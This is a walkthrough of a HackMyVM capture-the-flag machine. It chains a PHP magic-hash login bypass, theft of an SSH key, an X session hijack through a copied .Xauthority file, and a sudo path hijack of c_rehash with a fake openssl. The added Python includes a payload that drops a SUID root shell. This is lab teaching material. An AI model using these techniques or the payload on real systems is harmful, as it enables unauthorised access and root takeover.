A very interesting machine from HackMyVM; it can be downloaded here.
Nmap port scan.
Check the source code of index.html.
Fuzz port 80 for files with a ".bak" extension added.
Download check.bak and check its source code.
    <?php
    // Login part.
    $pass = $_POST['password'];
    //marco please dont use md5, is not secure.
    //$passwordhashed = hash('md5', $pass);
    $passwordhashed = hash('sha256',$pass);
    if ($passwordhashed == '0e0001337') {
        //Your code here
    } else{
        //Another code here
    }
    //To finish
    ?>
This is the PHP "magic hash" bug. The check uses the loose comparison `==`, and '0e0001337' is a numeric string in scientific notation (0 times 10^1337, i.e. 0). Any SHA-256 hex digest that starts with "0e" and continues with decimal digits only is also a numeric string worth 0, so the two compare equal, and PHP 8 still compares two numeric strings numerically. We just need a password whose SHA-256 digest has that shape, and lists of such strings are easy to find on Google.
wget https://raw.githubusercontent.com/spaze/hashes/master/sha256.md
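To show exactly why the check passes, here is the loose comparison reproduced in Python so it can be verified offline. This is an added example written for this writeup, not code from the page or the machine; the preimage 34250003024812 is taken from the spaze/hashes sha256 list fetched above, and "password" is just a control value.

```python
import hashlib
import re

# Numeric-string form PHP accepts (optional sign, digits/fraction, exponent).
# Python's float() parses the same forms, so the regex only keeps out things
# like "inf" or "0x1A" that PHP would not treat as numeric.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_is_numeric(s: str) -> bool:
    return _PHP_NUMERIC.match(s) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """PHP's `==` on two strings: two numeric strings are compared as numbers
    (true in PHP 7 and PHP 8 alike); anything else is compared byte-wise."""
    if php_is_numeric(a) and php_is_numeric(b):
        return float(a) == float(b)
    return a == b


def is_magic_hash(hexdigest: str) -> bool:
    """A hex digest of the form 0e<digits only> is scientific notation for
    0 * 10^N == 0, so it loosely equals any other such string, including the
    site's '0e0001337'."""
    return re.fullmatch(r"0e\d+", hexdigest) is not None


def sha256_hex(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def vulnerable_check(password: str) -> bool:
    """The comparison from check.bak: hash('sha256', $pass) == '0e0001337'."""
    return php_loose_eq(sha256_hex(password), "0e0001337")


def fixed_check(password: str, expected_hex: str) -> bool:
    """What `===` or hash_equals() gives: plain string equality, no coercion."""
    return sha256_hex(password) == expected_hex


def find_magic(candidates):
    """Return the candidates whose SHA-256 digest is a magic hash, i.e. the
    lines of a wordlist (such as the spaze/hashes file) that would log us in."""
    return [c for c in candidates if is_magic_hash(sha256_hex(c))]


# Known magic preimage from spaze/hashes sha256.md, plus a control value.
CANDIDATES = ["password", "34250003024812"]
```

Brute-forcing a fresh preimage is not practical (the digest must start with 0e and then consist of 62 decimal digits), which is why the published lists matter. The fix on the PHP side is `===` or `hash_equals()`, which is what `fixed_check` models.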
Log in as user "marco" with a password taken from the magic hash list. That gives us an SSH key.
Download the key file, strip the extra whitespace, chmod 600 it, and we can SSH in as marco.
In marco's home folder the file ".x" contains marco's password.
There is another user, maria. In maria's home folder we find a script, and we also notice that her .Xauthority file is writable by other users, but is currently 0 bytes.
myterm.sh just launches xterm on a specific DISPLAY.
With pspy64 we see a cron job running myterm.sh every minute.
What is .Xauthority? Ask Google.
.Xauthority holds the MIT-MAGIC-COOKIE-1 secrets an X client presents to the X server to be allowed onto a display. maria's .Xauthority is writable and empty, so if we replace it with marco's, the xterm that cron starts as maria will authenticate against marco's display, and we control that display.
Use rdesktop to log in on port 3389 as marco, with the password we found in marco's home folder.
Check id: we are marco now.
Replace maria's .Xauthority file with marco's.
After a while a new xterm window appears in the rdesktop session, and id in it is maria. (Another way is the "xhost +" command, as TataYoyo told me.)
Now we can create a .ssh folder and upload our public key.
Now we can SSH in as user maria.
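To make concrete what gets copied, here is a small parser and serializer for the .Xauthority format. This is an added example written for this writeup, not code from the page or the machine; the hostname "hackmyvm", the display number :1 and the cookie bytes are constructed stand-ins for marco's real file. Each record is a 2-byte family followed by four length-prefixed fields (address, display number, authorization name, secret), so copying marco's file into maria's hands over his MIT-MAGIC-COOKIE-1 unchanged, and that cookie is all the cron-started xterm needs to be accepted by marco's X server.

```python
import struct
from typing import List, NamedTuple

# Address families used in .Xauthority (values from Xauth.h).
FAMILY_INTERNET = 0
FAMILY_LOCAL = 256      # address holds the hostname; display reached via Unix socket
FAMILY_WILD = 65535


class XauthEntry(NamedTuple):
    family: int
    address: bytes   # e.g. the hostname for FAMILY_LOCAL
    number: bytes    # display number as ASCII digits, b"1" for :1
    name: bytes      # authorization protocol, normally b"MIT-MAGIC-COOKIE-1"
    data: bytes      # the secret: 16 random bytes for MIT-MAGIC-COOKIE-1


def _field(b: bytes) -> bytes:
    # Every variable-length field is a 2-byte big-endian length plus payload.
    return struct.pack(">H", len(b)) + b


def pack_xauthority(entries: List[XauthEntry]) -> bytes:
    """Serialize entries in the on-disk .Xauthority layout."""
    out = bytearray()
    for e in entries:
        out += struct.pack(">H", e.family)
        out += _field(e.address) + _field(e.number) + _field(e.name) + _field(e.data)
    return bytes(out)


def parse_xauthority(blob: bytes) -> List[XauthEntry]:
    """Parse a .Xauthority blob; an empty file (maria's 0-byte one) yields []."""
    entries: List[XauthEntry] = []
    off = 0

    def take_u16() -> int:
        nonlocal off
        if off + 2 > len(blob):
            raise ValueError("truncated .Xauthority entry")
        (n,) = struct.unpack_from(">H", blob, off)
        off += 2
        return n

    def take_field() -> bytes:
        nonlocal off
        n = take_u16()
        if off + n > len(blob):
            raise ValueError("truncated .Xauthority entry")
        v = blob[off:off + n]
        off += n
        return v

    while off < len(blob):
        family = take_u16()
        entries.append(XauthEntry(family, take_field(), take_field(),
                                  take_field(), take_field()))
    return entries


def is_wellformed(blob: bytes) -> bool:
    try:
        parse_xauthority(blob)
        return True
    except ValueError:
        return False


def cookie_for_display(entries: List[XauthEntry], number: bytes) -> bytes:
    """Return the MIT-MAGIC-COOKIE-1 secret for display :<number>, or b""."""
    for e in entries:
        if e.number == number and e.name == b"MIT-MAGIC-COOKIE-1":
            return e.data
    return b""


def format_like_xauth_list(e: XauthEntry) -> str:
    """Render an entry the way `xauth list` prints a FamilyLocal record."""
    host = e.address.decode()
    return f"{host}/unix:{e.number.decode()}  {e.name.decode()}  {e.data.hex()}"


# Constructed sample standing in for marco's .Xauthority after the rdesktop
# login (hostname, display :1 and cookie bytes are all assumptions).
MARCO_COOKIE = bytes.fromhex("00112233445566778899aabbccddeeff")
MARCO_XAUTHORITY = pack_xauthority([
    XauthEntry(FAMILY_LOCAL, b"hackmyvm", b"1", b"MIT-MAGIC-COOKIE-1", MARCO_COOKIE)
])
MARIA_XAUTHORITY_BEFORE = b""   # maria's file: writable and 0 bytes
```

On the box itself `xauth -f /home/marco/.Xauthority list` shows the same records, and `cp` of the whole file (or `xauth merge`) is the attack step. The `xhost +` alternative works because it disables X access control for every host, which is noisier than borrowing one cookie.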
sudo -l.
Check /usr/bin/c_rehash: it is a Perl script.
Run it without any parameters: nothing visible happens.
Reading the source, we notice that c_rehash calls the external openssl binary.
The online help page confirms that openssl is the key: c_rehash finds the binary by name rather than by an absolute path, so whatever it finds first is what runs, as root under sudo.
Enter maria's home folder, create a fake openssl there, then run c_rehash with sudo. BOOM! Root at last.
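The last step is a plain executable hijack: a program started by sudo resolves a bare command name through its search path, so a directory we control that comes first wins. Here is an added example, written for this writeup and not code from the page or the machine, that plants a fake "openssl" in a temporary directory, shows which file a lookup would pick, and audits a PATH string for entries an attacker could plant into. The payload in the fake binary (a SUID copy of /bin/sh) is the usual choice for this situation and is an assumption, not something the page shows.

```python
import os
import stat
import tempfile
from typing import Dict, List, Optional, Tuple


def resolve_command(name: str, path: str) -> Optional[str]:
    """Return the file a shell would run for a bare command name: the first
    executable regular file called `name`, walking PATH in order."""
    for d in path.split(os.pathsep):
        candidate = os.path.join(d or ".", name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def audit_path(path: str) -> List[Tuple[str, str]]:
    """Flag PATH entries an attacker could drop a binary into: empty or
    relative entries (they resolve against the working directory) and
    directories writable by the current user."""
    findings = []
    for d in path.split(os.pathsep):
        if d == "" or not os.path.isabs(d):
            findings.append((d, "relative entry resolves against the current directory"))
        elif os.path.isdir(d) and os.access(d, os.W_OK):
            findings.append((d, "writable by current user"))
    return findings


def make_fake_binary(directory: str, name: str, payload: str) -> str:
    """Drop an executable script called `name` into `directory`."""
    p = os.path.join(directory, name)
    with open(p, "w") as f:
        f.write(payload)
    os.chmod(p, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)
    return p


# Assumed payload: when root runs it, it leaves a SUID shell behind.
FAKE_OPENSSL = "#!/bin/sh\ncp /bin/sh /tmp/rootsh && chmod u+s /tmp/rootsh\n"


def demo() -> Dict[str, object]:
    """Constructed scenario: a writable directory first in the search path,
    holding a fake 'openssl'. Returns what resolves and what the audit flags."""
    with tempfile.TemporaryDirectory() as hijack_dir:
        fake = make_fake_binary(hijack_dir, "openssl", FAKE_OPENSSL)
        attacker_path = os.pathsep.join([hijack_dir, "/usr/bin", "/bin"])
        resolved = resolve_command("openssl", attacker_path)
        return {
            "fake_wins": resolved == fake,
            "flagged": [d for d, _ in audit_path(attacker_path)],
            "hijack_dir": hijack_dir,
        }


if __name__ == "__main__":
    print(demo())
```

Whether this works under sudo depends on the sudoers entry from `sudo -l`: a `secure_path` setting or environment reset would keep the planted directory out of root's search path, and then the fake binary has to sit wherever the script itself looks, which is why the writeup creates it in maria's home folder and runs c_rehash from there. The defensive fix on the c_rehash side is to invoke openssl by absolute path.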